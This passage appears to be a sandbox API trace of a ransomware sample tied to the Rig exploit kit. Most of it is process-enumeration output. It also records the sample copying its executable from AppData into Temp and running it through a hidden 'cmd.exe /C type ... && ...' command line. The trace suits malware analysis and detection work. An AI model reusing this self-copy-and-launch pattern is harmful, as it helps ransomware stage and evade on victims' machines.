lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.354] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.355] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.357] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.358] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.359] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.360] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.362] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.363] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.364] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0093.365] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0093.366] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0093.367] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0093.368] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0093.369] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0093.370] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0093.372] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0093.373] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0093.374] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0093.375] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0093.443] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0093.444] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0093.445] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0093.446] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0093.447] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0093.448] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0093.449] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0093.450] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0093.451] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.452] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.454] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0093.455] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa78, pcPriClassBase=8, dwFlags=0x0, szExeFile="2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe")) returned 1 [0093.455] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0093.456] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xab4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0093.457] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaac, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0093.458] Process32NextW (in: hSnapshot=0xc8, lppe=0x12fa2c | out: lppe=0x12fa2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0093.459] CloseHandle (hObject=0xc8) returned 1 [0093.459] GetTickCount () returned 0x22a98 [0093.459] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15024856226) returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="h") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="s") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="g") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="K") returned 1 [0093.459] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="r") returned 1 [0093.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="2") returned 1 [0093.460] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc04, cbMultiByte=1, lpWideCharStr=0x12ebec, cchWideChar=2047 | out: lpWideCharStr="p") returned 1 [0093.460] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1343bec, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0093.460] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0093.460] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0093.460] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1343bec, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0093.460] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0093.460] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0093.460] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\NHSGKR2P.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\NHSGKR2P.EXE\" [PARAMS]") returned 0xb1 [0093.460] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0093.460] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb44*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb34 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", lpProcessInformation=0x12fb34*(hProcess=0xc0, hThread=0xc8, dwProcessId=0xad4, dwThreadId=0xad8)) returned 1 [0093.491] CloseHandle (hObject=0xc0) returned 1 [0093.491] CloseHandle (hObject=0xc8) returned 1 [0093.491] Sleep (dwMilliseconds=0xfa) [0093.757] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0093.762] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0093.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0093.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0093.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0093.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0093.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0093.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0093.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0093.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0093.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0093.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0093.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0093.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0093.779] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0093.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0093.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0093.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0093.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0093.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f95c | out: lppe=0x12f95c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 